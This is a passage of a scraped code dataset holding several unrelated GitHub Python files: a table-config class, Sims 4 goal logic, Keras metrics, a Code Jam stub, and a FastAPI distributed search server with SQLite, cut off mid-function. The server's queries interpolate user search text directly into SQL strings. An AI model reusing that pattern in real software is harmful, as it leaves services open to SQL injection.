avoiding vestigial\n        # table columns\n        if field in self.allFields or self._findMatchingField(field) is not field:\n            return False\n        field.group = self.allFields\n        self.allFields.append(field)\n        if field.name not in self.config[\"fields\"]:\n            # Added programmatically outside config, ensure file representation is not\n            # lost\n            self.config[\"fields\"][field.name] = newFieldCfg = dict(field)\n            # Remove redundant `name` field\n            newFieldCfg.pop(\"name\")\n        return True\n\n    def makeComponentSeries(self):\n        return self.makeComponentDf().squeeze()\n\n    def loadConfig(\n        self, configPath: FilePath = None, configDict: dict = None, force=False\n    ):\n        \"\"\"\n        Loads the specified table configuration file for S3A. Alternatively, a name\n        and dict pair can be supplied instead.\n\n        Parameters\n        ----------\n        configPath\n            If *configDict* is *None*, this is treated as the file containing a\n            YAML-compatible table configuration dictionary. 
Otherwise, this is the\n            configuration name associated with the given dictionary.\n        configDict\n            If not *None*, this is the config data used instead of reading ``configPath``\n            as a file.\n        force\n            If *True*, the new config will be loaded even if it is the same name as the\n            current config\n        \"\"\"\n        baseConfigDict = copy.deepcopy(self.template)\n        if configPath is not None:\n            configPath, configDict = fns.resolveYamlDict(configPath, configDict)\n            configPath = configPath.resolve()\n        # Often, a table config can be wrapped in a project config; look for this case\n        # first\n        if configDict is not None and (\n            \"table-config\" in configDict or \"table-cfg\" in configDict\n        ):\n            configDict = getMaybeReplaceKey(\n                configDict, oldKey=\"table-cfg\", newKey=\"table-config\"\n            )\n\n        fns.hierarchicalUpdate(baseConfigDict, configDict, uniqueListElements=True)\n        cfg = baseConfigDict\n        if not force and self.configPath == configPath and pg.eq(cfg, self.config):\n            return None\n\n        self.configPath = configPath or self.configPath\n        self.config = cfg\n        self.parameterParser = YamlParser(cfg)\n        self.resetLists()\n        for field in cfg.get(\"fields\", {}):\n            param = self.parameterParser[\"fields\", field]\n            self.addField(param)\n\n        if self.filter:\n            self.filter.updateParameterList(self.allFields)\n        self.sigConfigUpdated.emit(self.config)\n\n    def clear(self):\n        self.loadConfig(configDict={})\n\n    def resetLists(self):\n        self.allFields.clear()\n\n    def fieldFromName(self, name: Union[str, OptionsDict], default=None):\n        \"\"\"\n        Helper function to retrieve the OptionsDict corresponding to the field with this\n        name\n        \"\"\"\n        return OptionsDictGroup.fieldFromParameter(self.allFields, name, default)\n\n    def resolveFieldAliases(self, fields: Sequence[OptionsDict], mapping: dict = None):\n        \"\"\"\n        Several forms of imports / exports handle data that may not be compatible with\n        the current table data. In these cases, it is beneficial to determine a mapping\n        between names to allow greater compatibility between I/O formats. Mapping is\n        also extended in both directions by parameter name aliases (parameter.opts[\n        'aliases']), which are a list of strings of common mappings for that parameter\n        (e.g. 
[Class, Label] are often used interchangeably)\n\n Parameters\n ----------\n fields\n Dataframe with maybe foreign fields\n mapping\n Foreign to local field name mapping\n \"\"\"\n\n outFields = []\n for srcField in fields:\n outFields.append(self._findMatchingField(srcField, mapping))\n return outFields\n\n def _findMatchingField(self, srcField, mapping: dict = None):\n # Mapping takes priority, if it exists\n if mapping is None:\n mapping = {}\n potentialSrcNames = getFieldAliases(srcField)\n for key in srcField, srcField.name:\n # Mapping can either be by string or OptionsDict, so account for either case\n outCol = mapping.get(key)\n if outCol:\n break\n\n if outCol is not None:\n # A mapping was explicitly provided for this field, use that\n return self.fieldFromName(outCol)\n elif srcField in self.allFields:\n return srcField\n else:\n # Not in mapping, no exact match.\n # TODO: what if multiple dest cols have a matching alias?\n # Otherwise, a 'break' can be added\n curOutName = srcField\n for destField in self.allFields:\n if potentialSrcNames & getFieldAliases(destField):\n # Match between source field's aliases and dest field aliases Make\n # sure it didn't match multiple names that weren't itself with the\n # assert statement In other words, if multiple dest fields have the\n # same alias, this assertion will fail\n assert curOutName == srcField\n curOutName = destField\n return curOutName\n\n def __reduce__(self):\n return TableData, (\n self.configPath,\n self.config,\n self.template,\n self.filter is not None,\n )\n","repo_name":"ntjess/s3a","sub_path":"s3a/tabledata/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":10413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20461284776","text":"import event_testing\nfrom event_testing.results import TestResult\nimport services\nfrom sims4.tuning.instances import lock_instance_tunables\nfrom sims4.tuning.tunable import AutoFactoryInit, TunableSingletonFactory, TunableRange, TunableSet, TunableEnumEntry\nfrom sims4.tuning.tunable_base import GroupNames\nfrom situations.situation_goal import SituationGoal\nfrom tag import Tag\n\nclass EarningsOfInterest(AutoFactoryInit):\n __qualname__ = 'EarningsOfInterest'\n FACTORY_TUNABLES = {'tags': TunableSet(description='\\n A set of tags that will match an affordance instead of looking\\n for a specific one. 
If you leave this empty, all Simoleons earned will be counted.\\n            ', tunable=TunableEnumEntry(Tag, Tag.INVALID)), 'amount_to_earn': TunableRange(description='\\n            The amount of Simoleons earned from all relevant activities for this\\n            goal to pass.\\n            ', tunable_type=int, default=10, minimum=1)}\n\n    def get_expected_args(self):\n        return {'amount': event_testing.test_events.FROM_EVENT_DATA, 'tags': event_testing.test_events.FROM_EVENT_DATA}\n\n    def __call__(self, amount=None, tags=None):\n        if amount is None:\n            return TestResult(False, 'Amount is None')\n        if len(self.tags) == 0 or tags is not None and self.tags & tags:\n            if amount > 0:\n                return TestResult.TRUE\n            return TestResult(False, 'No money earned')\n        return TestResult(False, 'Failed relevant tags check: Earnings do not have any matching tags in {}.', self.tags)\n\nTunableEarningsOfInterest = TunableSingletonFactory.create_auto_factory(EarningsOfInterest)\n\nclass SituationGoalSimoleonsEarned(SituationGoal):\n    __qualname__ = 'SituationGoalSimoleonsEarned'\n    SIMOLEONS_EARNED = 'simoleons_earned'\n    REMOVE_INSTANCE_TUNABLES = ('_post_tests',)\n    INSTANCE_TUNABLES = {'_goal_test': TunableEarningsOfInterest(description='\\n            Interaction and Simoleon amount that this situation goal will use.\\n            Example: Earn 1000 Simoleons from Bartending activities.\\n            ', tuning_group=GroupNames.TESTS)}\n\n    def __init__(self, *args, reader=None, **kwargs):\n        super().__init__(reader=reader, *args, **kwargs)\n        self._total_simoleons_earned = 0\n        self._test_events = set()\n        self._test_events.add(event_testing.test_events.TestEvent.SimoleonsEarned)\n        services.get_event_manager().register(self, self._test_events)\n        if reader is not None:\n            simoleons_earned = reader.read_uint64(self.SIMOLEONS_EARNED, 0)\n            self._total_simoleons_earned = simoleons_earned\n\n    def create_seedling(self):\n        seedling = super().create_seedling()\n        writer = seedling.writer\n        writer.write_uint64(self.SIMOLEONS_EARNED, self._total_simoleons_earned)\n        return seedling\n\n    def decommision(self):\n        services.get_event_manager().unregister(self, self._test_events)\n        super().decommision()\n\n    def _run_goal_completion_tests(self, sim_info, event, resolver):\n        if not resolver(self._goal_test):\n            return False\n        amount_to_add = resolver.get_resolved_arg('amount')\n        self._total_simoleons_earned += amount_to_add  # assumed fix: accumulate earnings, otherwise the completion check below could never pass\n        if self._total_simoleons_earned >= self._goal_test.amount_to_earn:\n            super()._on_goal_completed()\n        else:\n            self._on_iteration_completed()\n\n    @property\n    def completed_iterations(self):\n        return self._total_simoleons_earned\n\n    @property\n    def max_iterations(self):\n        return self._goal_test.amount_to_earn\n\nlock_instance_tunables(SituationGoalSimoleonsEarned, _iterations=1)\n","repo_name":"johndpope/sims4-ai-engine","sub_path":"simulation/situations/situation_goal_simoleons_earned.py","file_name":"situation_goal_simoleons_earned.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"}
{"seq_id":"40634813472","text":"from typing import Union\nimport keras.metrics\nimport numpy as np\nimport pandas as pd\nfrom keras.callbacks import Callback\nfrom scipy import sparse as sp\nimport tensorflow as tf\nimport keras.backend as K\nfrom preprocessing.constants import AUDIO_DATAFRAME_KEY, STATE_PROB_KEY, TRAIN_SET_PATH_MFCCS, \\\n    TRAIN_SET_PATH_MEL_SPEC, TEST_SET_PATH_MFCCS, TEST_SET_PATH_MEL_SPEC, N_STATES_MFCCS\n\n\ndef pandas_object_to_numpy_array(pandas_object) -> np.ndarray:\n    audio_tensor = np.zeros(\n        (len(pandas_object), 
pandas_object.iloc[0].shape[0], pandas_object.iloc[0].shape[1]))\n\n for i in range(0, len(pandas_object)):\n audio_tensor[i, :, :] = pandas_object.iloc[i]\n\n return audio_tensor\n\n\ndef load_dataset(path: str, mode: int = 0) -> Union[pd.DataFrame, tuple[np.ndarray, list[sp.lil_matrix]]]:\n \"\"\"\n Loads audio dataset from given path.\n\n :param path: path to load the dataset from.\n :param mode: if given 0 (as by default), numpy tensor containing audio features is unpacked from dataframe and\n separated from labels; if given 1 entire dataframe is given.\n :return: the loaded dataset with the corresponding labels.\n \"\"\"\n\n pandas_object_dataset = pd.read_pickle(path)\n\n if mode == 0:\n numpy_tensor_dataset = pandas_object_to_numpy_array(pandas_object_dataset[AUDIO_DATAFRAME_KEY])\n labels_sparse_matrix_list = list(pandas_object_dataset[STATE_PROB_KEY])\n return numpy_tensor_dataset, labels_sparse_matrix_list\n elif mode == 1:\n return pandas_object_dataset\n\n\ndef get_label_number(labels: list[sp.lil_matrix]) -> int:\n return labels[0].shape[1]\n\n\nclass EarlyStoppingByLossVal(Callback):\n def __init__(self, monitor='val_loss', value=0.01, verbose=0):\n super(Callback, self).__init__()\n self.monitor = monitor\n self.value = value\n self.verbose = verbose\n\n def on_epoch_end(self, epoch, logs=None):\n if logs is None:\n logs = {}\n current = logs.get(self.monitor)\n if current < self.value:\n if self.verbose > 0:\n print(\"Epoch %05d: early stopping THR\" % epoch)\n self.model.stop_training = True\n\n\ndef convert_sparse_matrix_to_sparse_tensor(x: list[sp.lil_matrix]) -> tf.SparseTensor:\n labels_list = []\n\n for m in x:\n coo = m.tocoo()\n indices = np.pad(np.mat([coo.row, coo.col]).transpose(), (1, 0), mode='constant')\n indices = indices[1:, :]\n casted = tf.cast(tf.SparseTensor(indices, coo.data, dense_shape=(1, ) + coo.shape), dtype=tf.dtypes.int64)\n labels_list.append(casted)\n\n labels = tf.sparse.concat(axis=0, sp_inputs=labels_list)\n\n return labels\n\n\ndef one_hot_labels_to_integer_labels(x: list[sp.lil_matrix]) -> np.ndarray:\n\n labels = np.zeros(shape=(len(x), x[0].shape[0]), dtype=np.int64)\n\n for i in range(0, len(x)):\n # Get non-zero column values (we take into account just column indexes because there is only 1 non-zero value\n # for each row)\n labels[i, :] = x[i].nonzero()[1]\n\n return labels\n\n\n@tf.keras.utils.register_keras_serializable(package='training_utils')\ndef coeff_determination(y_true, y_pred):\n \"\"\"\n Computes the Coefficient of Determination (also known as R^2 or R2).\n\n :param y_true: tensor of true targets.\n :param y_pred: tensor of predicted targets.\n :return: the Coefficient of Determination, obtained as (1 - SS_res/(SS_tot)), where\n SS_res = sum((y_true - y_pred)^2) and SS_tot = (y_true - mean(y_true)).\n \"\"\"\n ss_res = K.sum(K.square(y_true - y_pred))\n ss_tot = K.sum(K.square(y_true - K.mean(y_true)))\n return 1 - ss_res / (ss_tot + K.epsilon())\n\n\n@tf.__internal__.dispatch.add_dispatch_support\n@tf.keras.utils.register_keras_serializable(package='training_utils')\n@tf.function\ndef sparse_top_k_categorical_speaker_accuracy_mfccs(y_true, y_pred, k=N_STATES_MFCCS):\n \"\"\"\n Computes how often state targets are in the top `k` predictions for a single speaker.\n \"\"\"\n\n # Create empty output tensor to stack output for each audio\n top_k_accuracy_total_list = tf.TensorArray(dtype=tf.bool, size=0, dynamic_size=True)\n\n for i in tf.range(tf.shape(y_true)[0]):\n\n y_pred_audio = y_pred[i]\n y_true_audio = y_true[i]\n\n # 
Check the right range, looking the first y_true_audio element\n first_state = tf.cast(y_true_audio[0], dtype=tf.int32)\n\n start_range = tf.subtract(\n first_state,\n tf.math.mod(first_state, tf.convert_to_tensor(N_STATES_MFCCS))\n )\n\n end_range = tf.add(start_range, tf.convert_to_tensor(N_STATES_MFCCS))\n\n top_k_accuracy_audio = tf.fill(tf.shape(y_true_audio), tf.convert_to_tensor(False))\n # For each state\n for state in tf.range(start_range, end_range):\n y_true_audio_state = tf.fill(tf.shape(y_true_audio), state)\n\n # Calculate top_k_accuracy vector for given audio and apply logical OR with all the other states\n top_k_accuracy_audio = tf.math.logical_or(\n top_k_accuracy_audio,\n tf.compat.v1.math.in_top_k(y_pred_audio, tf.cast(y_true_audio_state, 'int32'), k)\n )\n # At the end of this loop, the top_k_accuracy_audio vector will contain True in i-th position if at least one\n # valid range state in the top-k most probable ones, so stack this result over the ones of the other audios\n top_k_accuracy_total_list = top_k_accuracy_total_list.write(\n index=top_k_accuracy_total_list.size(),\n value=top_k_accuracy_audio\n )\n\n top_k_accuracy_total = top_k_accuracy_total_list.stack()\n\n return tf.cast(top_k_accuracy_total, K.floatx())\n\n@tf.__internal__.dispatch.add_dispatch_support\n@tf.keras.utils.register_keras_serializable(package='training_utils')\n@tf.function\ndef speaker_n_states_in_top_k_accuracy_mfccs(y_true, y_pred):\n\n \"\"\"\n Computes how often state targets are in the top `k` most probable one of a target speaker divided by k, 1 if k\n states in top-k most probable, 0 if no states in the top-k most probable\n \"\"\"\n\n # Create empty list to stack output for each audio\n top_k_accuracy_total_list = tf.TensorArray(dtype=K.floatx(), size=0, dynamic_size=True)\n\n for i in tf.range(tf.shape(y_true)[0]):\n\n y_pred_audio = y_pred[i]\n y_true_audio = y_true[i]\n\n # Check the right range, looking the first y_true_audio element\n first_state = tf.cast(y_true_audio[0], dtype=tf.int32)\n start_range = tf.subtract(\n first_state,\n tf.math.mod(first_state, tf.convert_to_tensor(N_STATES_MFCCS))\n )\n end_range = tf.add(start_range, tf.convert_to_tensor(N_STATES_MFCCS))\n\n top_k_accuracy_audio = tf.fill(tf.shape(y_true_audio), tf.convert_to_tensor(0, dtype=K.floatx()))\n # For each state\n for state in tf.range(start_range, end_range):\n y_true_audio_state = tf.fill(tf.shape(y_true_audio), state)\n\n # Calculate top_k_accuracy vector for given audio and apply logical OR with all the other states\n top_k_accuracy_audio = tf.add(\n top_k_accuracy_audio,\n tf.cast(tf.compat.v1.math.in_top_k(y_pred_audio, tf.cast(y_true_audio_state, 'int32'), N_STATES_MFCCS),\n K.floatx())\n )\n\n # At the end of this loop, the top_k_accuracy_audio vector will contain the number x of valid range states\n # in the top-k most probable ones (not considering repeating probabilities, N_STATES_MFCCS in the best case, 0\n # in the worst case), then divide the result by N_STATES_MFCCS and take the minimum between 1 and the result\n # (to get 1 in the best case, considering also repeating probabilities in the top-k can cause the result of the\n # division to go above 1) and stack it over the ones of the other audios\n top_k_accuracy_audio = tf.minimum(\n tf.divide(top_k_accuracy_audio, tf.convert_to_tensor(N_STATES_MFCCS, dtype=K.floatx())),\n tf.fill(tf.shape(y_true_audio), tf.convert_to_tensor(1.0, dtype=K.floatx()))\n )\n top_k_accuracy_total_list = top_k_accuracy_total_list.write(\n 
index=top_k_accuracy_total_list.size(),\n            value=top_k_accuracy_audio\n        )\n\n    top_k_accuracy_total = top_k_accuracy_total_list.stack()\n\n    return tf.cast(top_k_accuracy_total, K.floatx())\n\n\n","repo_name":"MattiaLimone/dnn-hmm","sub_path":"training/training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"}
{"seq_id":"23585819431","text":"from math import pi\r\n\r\nr = []\r\nh = []\r\nside = []\r\nmax_r = 0\r\n\r\nif __name__ == '__main__':\r\n    \r\n    with open('in.txt', 'r') as file:\r\n        test_cases = int(file.readline())\r\n\r\n        for case_no in range(test_cases):\r\n\r\n            n, k = (int(inp) for inp in file.readline().split())\r\n\r\n            for i in range(n):\r\n                \r\n                ri, hi = (int(inp) for inp in file.readline().split())\r\n                r.append(ri)\r\n                h.append(hi)\r\n                side.append(2 * pi * ri * hi)  # use the per-pancake scalars ri and hi, not the accumulator lists r and h\r\n                \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/318.py","file_name":"318.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"72151664515","text":"from fastapi import FastAPI, Body\nfrom pydantic import BaseModel\nfrom typing import Optional, List\nfrom math import floor\nimport copy\nimport json\nimport re\nimport requests # For making requests to other servers and downloading files\n\nfrom file_handler import *\n# from app.file_handler import *\n\n\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom database import DataB, convert_str_to_text_class, Text\nimport threading, time, os\n\n# Logs\nfrom logs.logs_format import *\n\n#### SRI ####\nfrom vector_model import VectorModel\nfrom pathlib import Path\nimport database\n#############\n\nimport datetime\n\nfrom servers import *\n\n# Flag saying whether this is running locally or in Docker\nlocal = True\n\n# Type of hash to use\nhash_type = \"RANDOM\"\n\ntry:\n    if str(os.environ.get(\"LOCAL\")) == \"False\":\n        local=False\n    print_debug(f\"local: {local}\")\nexcept:\n    local = True\n# set manually\n# local = True\n# Docker\ngateway = \"172.21.0.1\"\n\n# Api Servers\nservers:List[Address] = get_servers(local)\n\n# servers = ['localhost']\n\n# Clusters of n servers. Update when a new server joins\nclusters = ['127.0.0.1']\n\n# Chord\nfirst_server_address_ip = '127.0.0.1' # Run it locally ('172.20.10.2')\nfirst_server_address_port = 10000 # Run it locally\n\nif not local:\n    first_server_address_ip = str(os.environ.get('FIRST_SERVER')) #servers[0].ip if len(servers) > 0 else 'localhost' # Run it locally\n    first_server_address_port = 8000 # Run it locally\n\n# Chord Thread\nstopped = False\n\nserver = '127.0.0.1'\nport = 10002 # Run it locally\n# brenckman,m. 
ting-yili\nif not local:\n server = str(os.environ.get('IP')) # Correrlo con Docker\n port = int(os.environ.get('PORT')) # Correrlo con Docker\n\nprint(\"ROXANA SERVER = \", server)\nprint(\"ROXANA PORT = \", port)\n\nTIMEOUT = 20\nif not local:\n try:\n TIMEOUT = int(os.environ.get('TIMEOUT')) # Correrlo con Docker\n except:\n pass\n\n# Files\nfilepath = \"/txts/\"\nif not local:\n try:\n filepath = str(os.environ.get('FILEPATH')) # Correrlo con Docker\n if filepath == \"None\":\n filepath = \"/txts/\"\n except:\n pass\n\n# Default Leader Port\nDEFAULT_LEADER_PORT = 8000\nif not local:\n try:\n DEFAULT_LEADER_PORT = int(os.environ.get('DEFAULT_LEADER_PORT'))\n except:\n pass\n\n# Hash\nif not local:\n try:\n hash_type = str(os.environ.get('HASH_TYPE'))\n print_debug(f\"Hash type: {hash_type}\")\n except:\n pass\n\napp = FastAPI()\n\n#ROXANA\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\nPATH_TXTS = os.path.join(CURRENT_DIR, \"txts\")\nDATABASE_DIR = os.path.join(CURRENT_DIR, \"databases\")\nlock = threading.Lock()\ndatabase = DataB()\nports_list = [] #LISTA DE PUERTOS DE CADA NUEVO SERVIDOR DE LA RED\nservers_ID_list = [] # NECESITO SABER EL TOTAL DE SERVIDORES DE LA RED y su ID\nservers_IP_list = [] # con su IP\nname_db = ''\n\n############ SRI ############\nvec_mod = VectorModel()\n#############################\n\n# Configuración de CORS\norigins = [\n \"http://127.0.0.1\",\n \"http://127.0.0.1:8080\",\n \"http://172.17.0.3\",\n \"http://172.17.0.3:8080\",\n \"http://172.17.0.1\",\n \"http://172.17.0.1:8080\",\n \"http://172.17.0.2\",\n \"http://172.17.0.2:8080\"\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\nfiles = [\n {\n \"id\":0, \n \"file\":{\"file_name\": \"Archivo de Roxana\", \"server_number\": 0}\n },\n {\n \"id\":1, \n \"file\":{\"file_name\": \"Archivo de Paula\", \"server_number\": 0}\n },\n {\n \"id\":2, \n \"file\":{\"file_name\": \"Archivo de Krtucho\", \"server_number\": 0}\n }\n]\n\n\n# def search_file(id):\n# return [file[\"file\"] for file in files if file[\"id\"] == id]\n\n\n# Si notification_type = True => Se refiere a buscar archivos por su nombre o ranking\n# Si notification_type = False => Se refiere a devolver archivos para download\ndef send_notification(server:str, results_, notification_type = True): #ROXANA\n print(\"Notificatin type +++++++++++++++\", notification_type)\n with lock:\n print(\"ENTRO EN SEND NOTIFICATION\")\n print(\"Hilo en ejecución: {}\".format(threading.current_thread().name))\n print(f\"server = {node.node_address.ip}, PORT = {node.node_address.port}\")\n try:\n result = requests.get(server, verify=False)\n\n print(\"\\R:\")\n print(\"result \",result)\n print(\"result.content \",result.content)\n print(\"result.text \",result.text)\n print(\"result.text[0] \",result.text[0])\n print(\"R/\")\n\n selected_list = result.json()\n print(\"selected list \", selected_list)\n except:\n print(\"--------------- DIO ERROR EN EL REQUEST DE send_notification\")\n\n if notification_type: #REQUEST SEARCH\n # selected_name = selected_list[1] #ARREGLAR\n # selected_result = selected_list[0]\n # print(\"selected_name \", selected_name)\n # if selected_name:# El resultado que devolvio la peticion es el nombre del archivo\n for r_name in selected_list:\n # print(\"r_name \", r_name)\n # print(\"r_name[0] \", r_name[0])\n # print(\"r_name[1] \", r_name[1])\n results_.append(r_name) #results.extend(r) # Add matched documents to the shared 
list\n print(\"results in send_notification \", results_)\n # else:# El resultado que devolvio la peticion es el ranking de los posibles archivos\n # for r_ranking in selected_result:\n # print(\"r_ranking \", r_ranking)\n # print(\"r_ranking[0] \", r_ranking[0])\n # print(\"r_ranking[1] \", r_ranking[1])\n # results_ranking.append(r_ranking)\n else: #REQUEST DOWNLOAD\n print(\"SENDIND REQUEST TO DOWNLOAD A FILE\")\n print(\"selected_list[0] \", selected_list[0])\n print(\"selected_list[1] \", selected_list[1])\n results_.append(selected_list)\n \n\ndef search_to_download(number: str): #ROXANA\n print(\"ENTRO EN SEARCH TO DOWNLOAD\")\n print(number)\n threading_list = []\n results_files_download = [] # List with the ranking and query documents results\n for i, member in enumerate(node.chan.osmembers.items()): # Esta parte sera necesaria hacerla sincrona para recibir cada respuesta en paralelo y trabajar con varios hilos\n print(f\"MEMBER {member}\")\n print(f\"ESTOY EN EL LLAMADO DE LOS HILOS: IP = {member[1].ip}\")\n print(f\"server = {node.node_address.ip}\")\n if member[1].ip == node.node_address.ip:continue \n # if member[1].port == node.node_address.port:continue # para correrlo local\n server = f'http://{member[1].ip}:{member[1].port}/api/download/{number}'\n t = threading.Thread(target=send_notification, args=(server, results_files_download, False), name=\"Hilo {}\".format(i))\n threading_list.append(t)\n print(\"T.START\")\n t.start()\n \n for t in threading_list:\n print(\"T.JOIN\")\n t.join()\n\n print(\"results_files_download \", results_files_download)\n print(\"len(results_files_download)=\", len(results_files_download))\n response = None\n for result in results_files_download:\n if type(result) != bool:\n response = copy.copy(result)\n break\n print(\"response \", response)\n return response\n\n\ndef search_by_text(text: str): #ROXANA\n print(\"ENTRO EN SEARCH BY TEXT\")\n print(text)\n threading_list = []\n results_ = [] # Shared list to store the matched document names and List with the ranking and query documents results\n # Construir ranking a partir de cada listado de archivos recibidos gracias al tf_idf\n # Search text in every server\n # TODO: Paralelizar peticiones a todos los servidores para pedirles sus rankings. 
https://docs.python.org/es/3/library/multiprocessing.html\n for i, member in enumerate(node.chan.osmembers.items()): # Esta parte sera necesaria hacerla sincrona para recibir cada respuesta en paralelo y trabajar con varios hilos\n print(f\"MEMBER {member}\")\n print(f\"ESTOY EN EL LLAMADO DE LOS HILOS: IP = {member[1].ip}\")\n print(f\"server = {node.node_address.ip}, PORT = {node.node_address.port}\")\n # Si se esta probando con docker o varias pcs la condicion del if es q no sea el mismo ip\n if member[1].ip == node.node_address.ip:continue \n # Si se esta probando local entonces la condicion del if es q no sea el mismo port\n # if member[1].port == node.node_address.port:continue \n server = f'http://{member[1].ip}:{member[1].port}/api/files/search/{text}'\n t = threading.Thread(target=send_notification, args=(server, results_), name=\"Hilo {}\".format(i))\n threading_list.append(t)\n print(\"T.START\")\n t.start()\n \n for t in threading_list:\n print(\"T.JOIN\")\n t.join()\n \n print(\"search_by_text results_name \",results_)\n #print(\"search_by_text results_ranking \",results_ranking)\n # Make Ranking \n # Luego de esperar cierta cantidad de segundos por los rankings pasamos a hacer un ranking general de todo lo q nos llego\n # TODO: Si alguna pc se demora mucho en devolver el ranking, pasamos a preguntarle a algun intregrante de su cluster que es lo que sucede\n \n # Return Response\n # Retornamos el ranking general de todos los rankings combinados\n \n print(\"@@@@@@@ results_ name AND ranking \", results_)\n\n #print(\"@@@@@@@ results_ranking \", results_ranking)\n\n unique_result = []\n for i in results_:\n if i not in unique_result:\n print(f\"-------for i in results_: i = {i} \")\n unique_result.append(i)\n\n\n # for i in results_ranking:\n # if i not in results_name:\n # results_name.append(i)\n\n #results_name_str = decorate_data(results_name)\n results_name_str = decorate_data(unique_result)\n # results_ranking_str = decorate_data(results_ranking)\n\n print(\"@@@@@@@ results_name_str \", results_name_str)\n\n # print(\"@@@@@@@ results_ranking_str \", results_ranking_str)\n\n # result = results_name_str + results_ranking_str\n \n # return results_name_str, results_ranking_str\n\n # return result\n\n # for i in results_ranking_str:\n # if i not in results_name_str:\n # results_name_str.add(i)\n\n return results_name_str\n\ndef decorate_data(results): #ROXANA\n # print(\"ENTRO A DECORATE DATA\")\n # print(\"results \", results)\n result = []\n # final_string = {}\n for i, elem in enumerate(results):\n final_string = {}\n # print(\"*final_string \", final_string)\n # print(f\"i={i}, elem= {elem}\")\n # print(\"elem[0] \", elem[0])\n # print(\"elem[1] \", elem[1])\n # final_string[f\"id_{i}\"] = elem[0]\n # final_string[f\"name_{i}\"] = elem[1]\n # # final_string[f\"url__{i}\"] = 'https://localhost:3000'\n # final_string[f\"url_{i}\"] = f'https://{server}:{port}'\n final_string[f\"id\"] = elem[0]\n final_string[f\"name\"] = elem[1]\n # final_string[f\"url__{i}\"] = 'https://localhost:3000'\n # final_string[f\"url\"] = f'https://{server}:{port}'\n final_string[f\"url\"] = f'http://{server}:{port}/download/{str(elem[0])}'\n result.append(final_string)\n # print(\"final string \", final_string)\n print(\"*********---------------------------------------\", result)\n # return final_string\n return result\n\n\ndef decorate_data_rank(ranking: list): \n print(\"ENTRO A DECORATE DATA\")\n print(\"results \", ranking)\n final_string = {}\n for i, elem in enumerate(ranking):\n 
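# Flatten each (id, similarity) pair into suffixed keys of a single shared dict; a list of per-item dicts (as decorate_data builds above) would avoid key collisions, but this mirrors the existing response shape.\n        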
print(f\"i={i}, elem= {elem}\")\n final_string[f\"id__{i}\"] = elem[0]\n final_string[f\"similarity__{i}\"] = elem[1]\n # final_string[f\"url__{i}\"] = 'https://localhost:3000'\n final_string[f\"url_{i}\"] = f'https://{server}:{port}'\n print(\"final string \", final_string)\n return final_string\n\n\ndef match_by_name(text:str): #ROXANA\n print(\"ENTRO EN MATCH BY NAME\")\n print(\"Hilo en ejecución: {}\".format(threading.current_thread().native_id))\n #select_files_title = f\"SELECT Title FROM File WHERE File.Title = '{text}'\"\n select_files_author = f\"SELECT ID, Title FROM File WHERE File.Author = '{text}'\"\n select_all_authors = f\"SELECT ID, Author FROM File\"\n select_all_titles = f\"SELECT ID, Title FROM File\"\n result_1 = database.execute_read_query(select_files_author)\n result_2 = []\n result_3 = database.execute_read_query(select_all_authors)\n result_4 = database.execute_read_query(select_all_titles)\n print(\"result_4 \", result_4)\n if len(result_4) > 0:\n for index, t in enumerate(result_4):\n if text in t[1]:\n result_2.append(t)\n print(\"result[0]\",t[0])\n print(\"result[1]\",t[1])\n print()\n\n print(\"-------------RESULTADO ALL AUTHORS\",result_3)\n print(\"-------------RESULTADO por AUTHOR, Title\",result_1)\n print(\"-------------RESULTADO ALL Titles\",result_4)\n print(\"-------------RESULTADO TITULOS SELECCIONADOS \", result_2)\n return result_1 + result_2 \n\n\n####### SRI #######\ndef tf_idf(textt: str):\n # http://localhost:10000/files/search/brenckman,m.\n # print(\"---------------Entro en tf_idf\")\n ranking = vec_mod.run(textt)\n result = []\n \n # print(\"---------------------\")\n # print(\"ranking\", ranking)\n # print(\"-------------\")\n\n for id, rank in ranking: #new_rank no esta definido. PONGO MOMENTANEAMENTE ranking\n # print(\" entro for del tf_idf ++++++++++++++++\")\n db_query = f\"SELECT ID, Title FROM File WHERE File.ID = '{str(id)}'\"\n for i in database.execute_read_query(db_query):\n # print(\"***** \", i)\n result.append(i)\n # print()\n # print(result)\n \n # print(\"---------------------\")\n # print(\"result\", result)\n # print(\"-------------\")\n\n return result\n # pass # Paula\n###################\n\n\ndef check_database(number):\n query = f\"SELECT ID FROM File WHERE File.ID = '{number}'\"\n result_ID = database.execute_read_query(query)\n return result_ID\n\ndef delete_db(directory, file_name):\n file_path = os.path.join(directory, file_name)\n if os.path.exists(file_path):\n os.remove(file_path)\n print(\"El archivo se ha eliminado exitosamente.\")\n else:\n print(\"El archivo no existe.\")\n\ndef add_to_database(datab, name_db, files: List[str], vec_mod_cond:bool):\n text_list = convert_str_to_text_class(PATH_TXTS,files)\n #A cada servidor le toca un archivo.db que se asigna en dependencia de su puerto\n print(\"DATABASE_DIR \", DATABASE_DIR + \"/\"+ name_db)\n if name_db != \"\":\n print(\"CREAR NUEVA BD\")\n delete_db(DATABASE_DIR, name_db)\n datab.create_connection(DATABASE_DIR + \"/\"+ name_db) #MODIFICAR CAMBIAR ITERACION\n \n for file in text_list:\n datab.insert_file(file)\n \n if vec_mod_cond:\n ######### SRI #########\n vec_mod.doc_terms_data(text_list) # se le pasa la lista de archivos que se le pasa a la base de datos de ese server\n # aqui empieza a calc os tf idf\n # print(vec_mod.doc_terms)\n #######################\n\n#asignar los documentos a cada server segun el orden en la lista\ndef assign_documents(start, end, datab, name_db): #ROXANA\n print(\"ENTRO AL assign_documents\")\n docs_to_add = []\n #toma los 
